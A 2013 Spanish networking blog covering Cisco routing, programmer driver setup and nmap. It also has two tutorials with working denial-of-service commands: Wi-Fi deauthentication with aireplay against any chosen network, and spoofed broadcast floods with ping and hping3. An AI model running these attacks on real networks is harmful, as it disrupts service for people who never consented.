jueves, 30 de mayo de 2013

Rutas Estaticas, Sumarizacion y Rutas por defecto en Router Cisco

Antes de continuar usted ya debe saber como configurar un router cisco en caso de que no lo sepa lo invito a que vea mi anterior entrada

Configuracion Basica de Router Cisco


Ruta Estatica

 Las rutas estaticas son utilizadas para la conexion entre redes pequenias ya que su utilizacion en redes grandes seria toda una proeza realizarlas, por su complejidad mientras mas cantidad de dispositivos de red hay en la red mayor es la complejidad de la red en operar bajo rutas estaticas.

para poder dar una mejor explicacion de la ruta estatica mostrare un ejemplo en base a un problema de redes.

tenemos la red 192.168.10.0 a la cual le crearemos 3 redes

  • una de 64 host
  • otra de 32 host
  • y la ultima de 2 host que es la que conectan las dos redes.
y queremos que estas redes se comuniquen una con otra, resuelve el problema.

ok sabiendo esto nos tocaria subnetear bajo VLSM la red dando como resultado esto.

Nota: si no sabes subnetear por VLSM dejame un comentario y si se juntan varias personas hare una entrada explicando el subneteo en VLSM.


HostDireccion de RedPrimera IPUltima IPDireccion de BroadcastMascara de Red
64192.168.10.0192.168.10.1192.168.10.126192.168.10.127255.255.255.128
32192.168.10.128192.168.10.129192.168.10.158192.168.10.159255.255.255.192
2192.168.10.160192.168.10.161192.168.10.162192.168.10.163255.255.255.252

una vez teniendo el subneteo es hora de configurar las ips en sus respectivas interfaces, esto no lo explicare ya que en la anterior entrada se explico como se realiza, asi que procedere a realizar las rutas estaticas.


ahora nuestro objetivo es comunicar la red 192.168.10.0 con la red 192.168.10.128, para eso utilizamos las rutas estaticas

el routerA tiene la ip 192.168.10.1 en su FastEthernet0/0 y en su interface Serial0/0/0 tiene la ip 192.168.10.161

el routerB tiene la ip 192.168.10.129 en su FastEthernet0/0 y en su interface Serial0/0/0 tiene la ip 192.168.10.162


asi que para comunicar routerA con routerB seria de esta forma.

RouterA(config)#ip route 192.168.10.128 255.255.255.192 192.168.10.162

ip route -> este comando es el que utilizamos para crear una ruta estatica.

192.168.10.128 -> en nuestro ejercicio esta ip representa la direccion de red de la re a la que queremos alcanzar

255.255.255.192 -> en nuestro ejercicio esta es la mascara de red que corresponde a nuestra direccion de red que queremos alcanzar

192.168.10.162 -> en nuestro ejercicio esta es la direccion del siguiente salto a la cual todo el trafico se dirigira en busca de la red que queremos alcanzar.

de igual manera el anterior valor puede ser sustituido por la interface de red como se muestra a bajo

RouterA(config)#ip route 192.168.10.128 255.255.255.192 Serial0/0/0

ahora realizaremos lo mismo de regreso .

RouterB(config)#ip route 192.168.10.0 255.255.255.128 192.168.10.161

ip route -> este comando es el que utilizamos para crear una ruta estatica.

192.168.10.0 -> en nuestro ejercicio esta ip representa la direccion de red de la re a la que queremos alcanzar

255.255.255.128 -> en nuestro ejercicio esta es la mascara de red que corresponde a nuestra direccion de red que queremos alcanzar

192.168.10.161 -> en nuestro ejercicio esta es la direccion del siguiente salto a la cual todo el trafico se dirigira en busca de la red que queremos alcanzar.

de esta forma se realiza la comunicacion por rutas estaticas.


Ruta por Defecto

las rutas por defecto son empleadas mayormente para ser como salida a internet ya que todo trafico que no se encuentre en la tabla de enrutamiento sera enviada hacia esa ruta.


ejemplo de rutapor defecto

Router(config)#ip route 0.0.0.0 0.0.0.0 Serial0/0/1

como podemos ver es similar a la ruta estatica solo que a diferencia de esta, aqui se indica que toda red sera enviada a la interface Serial0/0/1 que seria el enlace a Internet.


Ruta Estatica Sumarizada

la sumarizacion es empleada para resumir muchas direcciones de red en una sola lo cual nos ahorra mucho trabajo al momento de configurar rutas estaticas,

ahora veremos como se implementa mediante un ejercicio de redes.

supongamos que tenemos las redes
  • 192.168.1.0
  • 192.168.2.0
  • 192.168.3.0
realize la sumarizacion de esas redes y cree su ruta sumarizada para el RouterA.


primero que nada para realizar este ejercicio necesitamos convertir estas rutas en sus equivalentes en binario lo cual se veria de esta forma.

a claro se debe saber un poco de conversion de decimal a binario.

192.168.1.011000000.10101000.00000001.00000000
192.168.2.011000000.10101000.00000010.00000000
192.168.3.011000000.10101000.00000011.00000000

como podemos ver se crearon 4 octetos correspondientes a los segmentos de la direccion ip

para poder sumarizar, esto se realiza mediante una operacion AND en algebra booleana de Falso, Verdadero.

para ser mas claros cuando el valor en binario es uno se representa en electronica como el cierre de un circuito y cuando esta en cero se podria decir que el circuito esta abierto lo que vendria siendo un Falso

entonces empecemos a realizar la sumarizacion la primera hilera nos dice

1,0,1 que vendria siendo Verdadero, Falso, Verdadero, que da como resultado Falso, asi que seguimos hasta que de Verdadero

la siguiente hilera nos da.

0,1,1 que vendria siendo  Falso, Verdadero, Verdadero, que da como resultado Falso asi que continuemos

la siguiente hilera nos da.

0,0,0  que da Falso pero como aqui termina en donde se diferencian las direcciones de Red de aui partiremos para sacar la mascara de red dando como resultado la mascara

255.255.252.0


y como direccion de red para esta mascara de red sumarizada 192.168.0.0 ya que hasta la 4ta hilera que es 1,1,1 da como resultado Verdadero y el valor en decimal de ese segmento es 168 entonces quedaria como direccion de red la 192.168.0.0


ahora ya sabiendo todo esto es hora de crear la ruta estatica sumarizada

RouterA(config)#ip route 192.168.0.0 255.255.252.0 Serial0/0/0

y de esa forma hemos sumarizado 3 direcciones de red en una sola direccion de red y con esto concluyo esta entrada


Saludos.

martes, 28 de mayo de 2013

Master PROG en Debian Gnu/Linux


en esta ocaciones me saldre un poco del tema de la electronica para enseniarles como instalar el programador Master Prog, dejare una imagen a bajo para el que no lo conozca.




Master Prog es muy famoso en mercadolibre ya que es un programador clon del famoso programador de microchip, empresa creadora de los PIC.

para ser mas exactos Master Prog es un generico del conocido pickit2 el programador de microchip, desafortunadamente al comprar nuestro programador Master Prog, dicho programador solo es soportado en plataforma Windows, pero gracias a que es un generico del programador pickit2, podemos usar el controlador para GNU/Linux de pickit2 solo haciendo unas sencillas modificaciones, las cuales explicare en seguida :P

primero necesitamos instalar dependencias necesarias

(jopc)# apt-get install libusb++-dev make g++

luego descargamos el controlador, lo podemos hacer desde aqui:

Controlador


seguidamente procedemos a ir a la carpeta donde se descargo y procedemos a descomprimir

(jopc)#cd /home/jopc/Descargas/
(jopc)#tar -zxvf pk2*

una vez que ya lo hemos descomprimido procedemos a la compilacion e instalacion del controlador




(jopc)cd pk2*
(jopc)#make linux
(jopc)#make install

ahora solo nos queda copiar el archivo PK2DeviceFile.dat que se ha generado a esta direccion /usr/local/bin

(jopc)#cp PK2DeviceFile.dat /usr/local/bin

una vez hecho todo esto conectamos nuestro programador Master Prog  y ejecutamos el siguiente comando

(jopc)#pk2cmd -?v

lo cual si todo resulta bien lanzara algo parecido a esto


 


en dado caso que les lanze un no found como a mi me ocurrio igual explicare como reparar ese error.


dicho error se debe a que el ID que tiene por defecto el driver es el 04d8 el cual no es el mismo en el master prog, en mi caso el ID era el 1234 pero para saber exactamente cual es el verdadero ID de su Master Prog, usaremos el siguiente comando



(jopc)#lsusb

este comando nos lanzara como resultado algo parecido a esto.

Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 017: ID 1234:0033 Brain Actuated Technologies
Bus 001 Device 003: ID 0bda:58c0 Realtek Semiconductor Corp.


y como pueden ver el ID es el 1234, una vez sabiendo esto borraremos todos loc ocmpilados que hicimos con este comando, pero antes tenemos que acceder de nuevo a la carpeta que descomprimimos

#cd /home/jopc/Descargas/pk2*
#make clean

ahora procedemos a cambiar el valor 0x04d8 por 0x1234 en estos dos archivos, podemos usar nuestro editor de texto favorito, a mi se me hace mas practico usar nano y usar control+w para hacer busquedas dentro del documento .cpp


usbhidioc.cpp
pk2usb.cpp


una vez modificados, es hora de volver a compilar e instalar al igual de copiar el archivo que se genera de esta forma.

(jopc)#make linux
(jopc)#make install
(jopc)#cp PK2DeviceFile.dat /usr/local/bin

ahora volvemos a probar el comando anterior

(jopc)#pk2cmd -?v

y nos dira que todo a salido satisfactoria mente  :)

de esa manera tenemos nuestro master prog instalado en nuestro Debian Gnu/Linux




lunes, 27 de mayo de 2013

Denegando los servicios en las Redes WIFI


Hoy es Lunes y me toca explicar algo sobre hacking, asi que manos a la obra, siguiendo con el hilo de las denegaciones de servicio, hoy les tengo, como denegar servicios en redes wifi tanto al AP (Access Point) como algun cliente de la red.


ok, antes de empezar, como siempre digo, no me hago responsable de lo que sea aprendido en esta entrada, asi que dejare nuevamente el mensaje.


Advertencia: el autor de este documento no se hace responsable de lo que el lector haga con el material, toda responsabilidad caera en manos del perpretador.

una vez que hayan entendido de que no me hago responsable si los encarcelan, continuemos.


para realizar una denegacion de servicio en redes wifi es algo sencillo solo necesitamos una tarjeta wifi con modo promiscuo o modo monitor como le quieran decir y una distribucion de gnu/linux para realizar esta proeza

ok ya sabiendo que necesitamos todo esto, en dado caso de que no tengas una tarjeta en modo monitor, puedes comprarte una en mercadolibre :P claro si es que te interesa.


D.O.S. al Punto de Acceso


afirmo que no necesitamos estar en a red del AP para poder realizar este ataque, ok empezemos.

para iniciar necesitamos saber en que canal esta funcionando el AP que Dosearemos, asi que usaremos este comando:

(jopc)#iwlist wlan0 scan

el anterior comando nos mostrara una lista con todas las redes wifi encontradas por nuestra tarjeta inalambrica, entre todo ese texto escogeremos una red que nos guste y copiaremos el numero de canal como en el ejemplo de abajo.

Ejemplo:

(jopc)#iwlist wlan0 scan

          Cell 01 - Address: E0:1D:3B:54:CA:F0
                    Channel:4
                    Frequency:2.427 GHz (Channel 4)
                    Quality=25/70  Signal level=-85 dBm 
                    Encryption key:on
                    ESSID:"XXXXX"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=00000003e4e3546f
                    Extra: Last beacon: 4ms ago
                    IE: Unknown: 000D494E46494E4954554D43373930
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030104
                    IE: Unknown: 0706555320010B1B
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101870003A4000027A4000042435E0062322F00
                    IE: Unknown: DD1E00904C33CC111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 2D1ACC111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: DD1A00904C3404080800000000000000000000000000000000000000
                    IE: Unknown: 3D1604080800000000000000000000000000000000000000
                    IE: Unknown: 4A0E14000A002C01C800140005001900
                    IE: Unknown: 7F0101
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD0A00037F04010000004000
                    IE: Unknown: DD860050F204104A0001101044000102103B0001031047001000000000000010000000E01D3B54CAF0102100034349471023000F4349472047504F4E204F4E542052471024000B43494730303030303030311042000831323334353637381054000800060050F20400011011000F4349472047504F4E204F4E54205247100800020082103C000103



como pudimos observar la red XXXXX, esta trabajando en el canal 4 y su direccion mac es E0:1D:3B:54:CA:F0 esta es toda la informacion que necesitamos para realizar una D.O.S. en la red wifi

ahora pocederemos a activar el modo monitor de nuestra tarjeta


(jopc)# airmon-ng start wlan0

esto nos creara una nueva interfaz de red llamada mon0 que sera la que utilizaremos para hacer la Denegacion.

ahora colocaremos nuestra tarjeta a monitorear la red XXXXX

(jopc)# airodump-ng -c 4 mon0

-c  parametro de airodump-ng para definir el canal de la victima

mon0  la interfaz en modo monitor

una vez que esta monitoreando la red es hora de lanzar el ataque, asi que abrimos otra terminal y tecleamos lo siguiente.

(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 mon0

-0 parametro que indica ataque de desautenticacion

0  tiempo de espera entre cada envio de desautenticacion

-a  direccion mac del Punto de acceso (AP).

mon0  interfaz de red



D.O.S. a clientes conectados al AP

este metodo es sencillo, solo explicare el comando final por que no viene al caso explicar mas ya que el proceso es igual a este.

Ejemplo:


(jopc)# airplay-ng -0 0 -a E0:1D:3B:54:CA:F0 -c 00:11:22:33:44:55 mon0

-c parametro que indica la direccion mac de el cliente victima

00:11:22:33:44:55   direccion mac del cliente victima

bueno eso es todo por hoy un pequeño manual de como realizar denegacion de servicio en redes wifi, las direcciones mac de los clientes de la red lo pueden ver con el comando anteriormente mensiondo "airodump-ng -c 4 mon0"
ahi aparecen las direcciones mac de los equipos asociados a la red.

y de nuevo me despido y espero no hagan travesuras con esto :P


Saludos.

lunes, 20 de mayo de 2013

Ataque Smurf, saturando las redes LAN desprotegidas


Bueno, como se los prometi cada lunes explicare algo sobre hacking, la semana pasada fue sobre nmap y como usarlo, ahora enseniare algo que por mi parecer no deberia enseniar, asi que antes de enseniarlo pondre una advertencia.

ADVERTENCIA: la informacion que sera mostrada a continuacion es peligrosa, el autor es decir yo no me hago responsable de lo que el lector haga con esta informacion, toda responsabilidad caera en manos del perpretador.

ya una vez aclarado eso, de que yo no me hago responsable de lo que hagan, podemos seguir :)

a claro que  esto solo lo ensenio como fines educativos no para molestar al progimo.


Ataque Smurf


el ataque smurf es un ataque de denegacion de servicio que se encarga de crear una tormenta de broadcast con ip de origen spoofeada, es decir realizamos peticiones ICMP a la direccion de broadcast en donde en el encabezado de ICMP nuestra ip de origen es falsa,

como ya debemos saber el broadcast en las redes produce que al enviar un paquete a esta direccion el mensaje se reenvie a todos los equipos en la red, entonces ¿que pasaria si la ip de origen no existiera? pues se crearia algo parecido a una tormenta de paquetes en la red, para entender mejor esto dare un ejemplo de como realizar un una tormenta de broadcast pero sin ip spoofeada, solo cuando la ip es spoofeada se conviente en ataque smurf.

los ejemplos seran explicados paso a paso, primero se mostrara un ejemplo y seguidamente cada parametro que lo compone.

Ejemeplo

(jopc)$su
(jop)#ping -b -f -s1472 192.168.0.255

ping    como ya lo habras de saber envia paquetes ICMP a la ip objetivo

-b  parametro que permite enviar paquetes a la ip de broadcast, obligatoria mente debes tener permisos de root para usarlo

-f  paramentro que permite realizar flood, es decir enva paquetes ICMP sin esperar la respuesta del ping

-s  parametro que indica el tamanio del paquete ICMP a enviar

1472   es el tamanio del paquete optimo para el envio de paquetes al broadcast es mejor dejarlo con ese tamanio cuando atacamos al broadcast


192.168.0.255   la ip de broadcast, esta puede ser cambiada por la ip de broadcast perteneciente a la red que vayamos a testear


como podemos observar esta instruccion es similar al famoso ping de la muerte de la epoca del win95 pero a diferencia de este, este envia ping al broadcast saturando la red, la desventaja de este ataque es que el atacante igual se queda colgado al igual que los atacados, de ahi que sea mejor el ataque smurf, ahora veremos un ejemplo del ataque smurf, pero antes explicare que fue el ping de la muerte :) 

El Famoso Ping de la Muerte




el ping de la muerte se hizo muy popular en el anio 96 y 97 cuando el windows 95 dictaba en los ordenadores corporativos e institucionales, en si el ping de la muerte se basa en enviar paquetes muy pesados a la ip destino mas bien paquetes de 65535bytes, en ese tiempo los paquetes ICMP eran libres no tenian un limitante de cantidad de paquetes que podrian permitir y cuales no, y como la velocidad de procesamiento en esa epoca era muy limitada producia colapsos en el sistema lo cual tiraba las maquinas atacadas, despues de un tiempo al descubrir el funcionamiento de los ataques crearon parches que permiten limitar el tamanio de los paquetes ICMP con lo que paquetes de mayor tamanio o iguales a 65535bytes son bloqueados y paquetes normales de 32bytes o un poco superior son permitidos.


Practica Ataque Smurf ya de una breve explicacion de que es smurf, que es tormenta de broadcast y como producirla, le toca al ataque smur hacer su aparicion, aclaro no me hago responsable.

bueno lo que usaremos en esta ocaciones el programa que se llama hping3 lo puedes instalar pero si usan un sistema de testing de seguridad ya vendra incluido.


bueno manos a la obra.

(jopc)#hping3 --spoof 192.168.0.10 --flood 192.168.10.255

ahora explicare cada paramentro
hping3  es una aplicacion que permite jugar con el los paquetes ping a demas de realizar otras funciones interesante.

--spoof  este paramentro le indica a hping3 que la ip de origen de los paquetes que envie contendran una ip que sera asignada en este caso vendria siendo la ip "192.168.0.10" esta ip puede ser inventada o puede ser el de algun equipo en la red

--flood  este paramentro le indica a hping3 que reaizara flood a la direccion indicada en este caso sera la ip de broadcast "192.168.0.255"


y de esa forma concluye esta entrada, recuerden no hagan travesuras con estos conocimientos, por que les podria ir mal xD es enserio si los meten al bote por esto, es que fue culpa suya, no mia.

Saludos.

viernes, 17 de mayo de 2013

Configuracion Basica de Router Cisco


Introducción

Bueno se que esto debí haberlo publicado ayer, pero por falta de tiempo, producto de tareas que aun no he concluido, no pude publicarlo, y que es peor ya se me amontono por que debo la entrada que va enfocado a la electrónica.

Empecemos


Bueno ya al grano, antes de entrar al tema de la configuracion basica de cisco hay que saber algo sumamente importante de los equipos cisco, tanto sea router como switch y esto es que tienen modulos o estados de acceso, estos estados los mencionare a bajo.



  • Modo Exec Usuario: este modo solo permite ver solo informacion superficial del router o switch mas bien informacion limitada, no permite realizar modificaciones y puede ser representado con el signo ">"
  • Modo Exec Privilegiado: este modo permite ver en detalle la configuracion del router o switch, ademas de ello da la posibilidad de hacer pruebas de diagnostico, este estado se puede diferenciar por el signo "#"
  • Modo Exec de Configuracion Global: este modo permite hacer configuraciones basicas en el equipo de red, ademas de que permite el acceso a submodulos para realizar configuraciones especificas, se puede identificar este modo mediante este signo "(config)#".


ahora ya sabiendo esto tenemos una idea de los tipos de permisos y accesos al sistema de los equipos de red cisco, bueno, es hora de comenzar con la configuracion basica, el procedimiento de aprendizaje es sencillo colocare configuracion y seguidamente explicare que es lo que estoy haciendo para que puedan entenderlo.


router>
router>enable
router#configure terminal
router(config)#

como pueden apreciar he accedido por los modos de acceso que he mencionado anteriormente.

enable el comando enable nos permite acceder al "Modo Exec Privilegiado".

configure terminal este comando nos permite acceder al "Modo Exec de Configuracion Global"

ya sabiendo los comandos mas importantes es hora de explicar especificamente cada comando

router(config)#hostname JOPC
JOPC(config)#


hostname    el comando hostname seguido de un paramentro que vendria siendo el nuevo nombre del dispositivo de red nos da como resultado la reasignacion de un nuevo nombre al dispositivo de red, como en en el ejemplo, el nombre asignado fue "JOPC".


router(config)# enable secret 12345

enable secret  el comando enable secret seguido de un parametro que vendria siendo la contraseña asignar al "Modo Exec Privilegiado", como ya dije sirve para asignarle una contraseña al "Modo Exec Privilegiado"

router(config)#line con 0
router(config-line)#password 12345
router(config-line)#login
router(config-line)#exit
router(config)#

line con  el comando line con seguido del parametro 0 le indica a la instruccion que accederemos a la interfaz de consola 0

password el comando password seguido del parametro 12345 le indica a la instruccion que configurara la contraseña con el parametro 12345

login el comando login  habilita la contraseña configurada anteriormente

exit  el comando exit nos saca del submodo line y nos regresa al modo exec global  

line  el comando line ademas de soportal el modo consola igual soporta otros como es el vty el cual permite usar el servicio telnet para acceder al dispositovo de red, al agregarle el rango de usuario a acceder que vendrian siendo de 0 a 4 tendriamos 5 lineas de acceso por telnet, a bajo colocare un ejemplo de como configurar telnet.

router(config)#line vty 0 4
router(config-line)#password 12345
router(config-line)#login
router(config-line)#exit
router(config)#

 Configurando interfaces de red

ahora es momento de explicar como configurar interfaces de red pues empecemos

router(config)# interface f0/0
router(config-if)#ip address 192.168.0.1 255.255.255.0
router(config-if)#no shutdown
router(config-if)#description  RED
router(config-if)#exit

router(config)#


interface f0/0  el comando interface f0/0 nos permite acceder la la interfaz fisica FastEthernet0/0

ip address el comando ip address configura con una ip del rango de ips y una mascara de red la interfaz f0/0

no shutdown  el comando no shutdown levanta la interfaz  para que se agregue a la tabla de enrutamiento.

description el comando description seguido de un parametro de cadena nos permite etiquetar la interfaz con alguna descripcion para saber que funcion tiene dicha interfaz.


El procedimiento de configuracion de la interfaces seriales es similar y solo se diferencia un poco por el uso del comando clock rate, dicho comando solo le da la velocidad de reloj entre el DCE  (hembra) DTE (Macho), la interfaz serial con DCE es el unico que debe llevar el comando clock rate, ahora se mostrara un ejemplo de la configuracion de cada uno, los comandos no se explicaran ya que no tiene caso repetir los mismo comandos usados en la configuracion de interfaces FastEthernet.

DCE

router(config)# interface serial 0/1
router(config-if)# ip address 10.0.0.1 255.255.255.252
router(config-if)# clock rate 56000 
router(config-if)# no shutdown 
router(config-if)# description RED 
router(config-if)# exit 
router(config)#

 
DTE

router(config)# interface serial 0/1
router(config-if)# ip address 10.0.0.2 255.255.255.252
router(config-if)# no shutdown 
router(config-if)# description RED 
router(config-if)# exit 
router(config)#
bueno con eso acaba esta parte de configuracion basica en routers cisco, no se vieron algunos comandos por lo fugas que fue esta entrada, pero a futuro tal vez sean publicados


Saludos.


lunes, 13 de mayo de 2013

mini guia de usuario para el manejo de nmap

mm bueno empezemos, explicare que es nmap, nmap es una aplicacion de codigo abierto para el analisis de puertos en redes computacionales ademas de eso realiza otras funciones que tal vez veamos en otra entrada de nmap, ok, en las redes computacionales hay un total de 65535 puertos logicos tanto para TCP como para UDP

aqui anexo una tablita con la mayoria de los puertos y el protocolo que la utilizan por defecto

Puerto Descripción
1 TCP Port Service Multiplexer (TCPMUX)
5 Remote Job Entry (RJE)
7 Protocolo Echo (Responde con eco a llamadas remotas)
9 Protocolo Discard (Elimina cualquier dato que recibe)
13 Daytime (Fecha y hora actuales)
17 Quote of the Day (Cita del Día)
18 Message Send Protocol (MSP)
19 Protocolo Chargen, Generador de caractéres
20 FTP — Datos
21 FTP — Control
22 SSH, scp, SFTP – Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
29 MSG ICP
37 Time
42 Host Name Server (Nameserv)
43 WhoIs
49 Login Host Protocol (Login)
53 Domain Name System (DNS)
66 Oracle SQLNet
67 BOOTP (BootStrap Protocol) (Server), también usado por DHCP
68 BOOTP (BootStrap Protocol) (Client), también usado por DHCP
69 Trivial File Transfer Protocol (TFTP)
70 Gopher Services
79 Finger
80 HTTP
88 Agente de autenticación Kerberos
103 X.400 Standard
107 Remote Telnet Service
108 SNA Gateway Access Server
109 POP2
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
119 Newsgroup (NNTP)
123 NTP
137 NetBIOS Name Service
138 NetBIOS Datagram Service
139 NetBIOS Session Service
143 Internet Message Access Protocol (IMAP)
156 SQL Server
161 SNMP
162 SNMP-trap
177 XDMCP (Protocolo de gestión de displays en X11)
179 Border Gateway Protocol (BGP)
190 Gateway Access Control Protocol (GACP)
194 Internet Relay Chat (IRC)
197 Directory Location Service (DLS)
209 Quick Mail Protocol
217 dBASE Unix
389 Lightweight Directory Access Protocol (LDAP)
396 Novell Netware over IP
443 HTTPS
444 Simple Network Paging Protocol (SNPP)
445 Microsoft-DS (Active Directory, compartición en , gusano Sasser, Agobot)
458 Apple QuickTime
500 IPSec ISAKMP, Autoridad de Local
512 exec
513 login
514 syslog usado para logs del sistema
515 Printer
520 RIP
522 Netmeeting
531 Conference
546 DHCP Client
547 DHCP Server
563 SNEWS
569 MSN
631 CUPS: sistema de impresión de Unix
666 identificación de Doom para jugar sobre TCP
992 Telnet SSL
993 IMAP4 SSL
995 POP3 SSL
1080 Socks Proxy
1352 IBM Lotus Notes/Domino RCP
1433 Microsoft-SQL-Server
1434 Microsoft-SQL-Monitor
1494 Citrix MetaFrame Cliente ICA
1512 WINS
1521 Oracle listener
1701 Enrutamiento y Acceso Remoto para VPN con L2TP
1723 Enrutamiento y Acceso Remoto para VPN con PPTP
1761 Novell Zenworks Remote Control utility
1863
2049 NFS
2082 CPanel
2086 WHM (Web Host Manager)
2427 Cisco MGCP
3000 Calista IP phone (saliente)
3030 NetPanzer
3128 Squid Proxy
3306 MySQL
3389 Microsoft Terminal Server
3396 Novell agente de impresión NDPS
3690 SubVersion
4099 AIM Talk
4662 eMule
4672 eMule
4899 RAdmin
5000 UPNP (Universal plug-and-play)
5060 SIP (Session Initiation Protocol)
5190 Calista IP phone (entrante)
5222 XMPP/Jabber: conexión de cliente
5223 XMPP/Jabber: puerto por defecto para conexiones de cliente SSL
5269 XMPP/Jabber: conexión de servidor
5432 PostgreSQL
5500 VNC (Virtual Network Computing)
5517 Setiqueue proyecto SETI@Home
5631 pcAnyWhere (host)
5632 pcAnyWhere (host)
5400 VNC (Virtual Network Computing)
5500 VNC (Virtual Network Computing)
5600 VNC (Virtual Network Computing)
5700 VNC (Virtual Network Computing)
5800 VNC (Virtual Network Computing)
5900 VNC (Virtual Network Computing)
6000 X11 usado para X-windows
6112 Blizzard Entertainment
6129 Dameware: conexión remota
6346 Gnutella
6347 Gnutella
6348 Gnutella
6349 Gnutella
6350 Gnutella
6355 Gnutella
6667 IRC
6881 BitTorrent: puerto por defecto
6891-6900 MSN Messenger (archivos)
6901 MSN Messenger (voz)
6969 BitTorrent: puerto de tracker
7100 Servidor de Fuentes X11
8000 Shoutcast
8080 HTTP alternativo al puerto 80. También Tomcat default
8118 privoxy
8291 routers Microtik
9009 Pichat peer-to-peer chat server
9898 Dabber (troyano)
10000 Webmin (Administración remota web)
12345 Netbus (troyano)
19226 Puerto de comunicaciones de Panda Agent
20000-20019 ICQ
28800-29000 MSN Game Zone
31337 Back Orifice (troyanos)


ya al grano, si manejamos Linux o Windows la sintaxis de los programas es la misma, pero al yo ser linuxero usare ejemplos de linux :P

en estos ejemplos primero se colocara la sentencia y luego se explicara parte por parte.

Ejemplo:

(jopc)#nmap -sS -Pn -O -p80 www.sitioweb.com

-sS  es la opcion que viene por defecto en nmap eso quiere decir que no es necesario colocarcelo y lo que realiza es un scaneo de puertos  sigiloso, ya que envia paquetes deformes syn lo esencial para saber si un puerto esta activo o  no.



-Pn esta instruccion es escencial al momento de encontrarnos con firewalls que bloquean los analisis de puertos via icmp, al colocar esta instruccion le indicamos a nmap que procederemos a usar paquetes TCP para el decubrimiento de puertos.

-O  nos indica que sistema operativo esta corriendo el en equipo destino, actualmente este parametro no es muy fiable ademas de ello, no te da exactamente que sistema corre en ese equipo si no que te da una problabilidad de cual se asemeja, el funcionamiento de este parametro es por el comportamiento de como contesta el sistema al procesar los paquetes que se le envia y con base a eso el programa se encarga de dar un aproximado de cual es el mas semejante, actualmente nmap pide que le actualizemos los resultados de comportamiento de los sistemas operativos por lo cual al saber uno que sistema operativo corre y al no reconocerlo nmap, podriamos informarles a los desarrolladores de esto para que en una futura actualizacion nmap pueda reconocerlo

-p80   este parametro sirve para especificarle a nmap que queremos realizar un scaneo de puertos solo a dicho puerto el 80, se pueden especificar mas mediante separaciones con comas y mediante rangos solo separando el ip de inicio con la ip de final

Ejemplo:

-p80,21,25,22 en este ejemplo de indicamos que solo analice los puertos 80,21,25 y 22

-p1-100 en este ejemplo le indicamos que solo analice los puertos del 1 hasta el 100

www.sitioweb.com   esto es sencillo es el sitio web el cual estariamos analizando


ya sabiendo todo esto explicare lo que son los derivados de cada parametro, nmap es una aplicacion algo compleja que no se podria explicar todos sus parametros en una entrada asi que en futuras entradas explicare mas de el pero por ahora explicare los derivados de parametro -sS mas usados


-sn permite realizar descubrimientos de ips en la red sin la necesidad de scanear el puerto de todas esas ips ya de ignora el scaneo, mas bien es para descubrir ips activas en la red




Ejemplo:

(jopc)# nmap -sn -Pn 192.168.10.0/24

este ejemplo explica como usariamos el parametro -sn  al indicarle a nmap esta direccion de red 192.168.10.0 con el prefijo 24 le decimos a nmap que revise en la red cuales ips estan activas.

-sT  permite realizar scaneos a ips solo a puertos TCP

-sU permite realzar scaneos a ips solo a puertos UDP

-sV permite realizar scaneos a ips y saber la version del servicio que corre en los puertos scaneados

-S  permite spoofear la ip de origen al momento de un analisis.


mm bueno eso es todo por ahora ya luego publicare mas ya lo demas de nmap son cosas malas y no creo conveniente publicarlas ahorita xD pero sera mas tarde.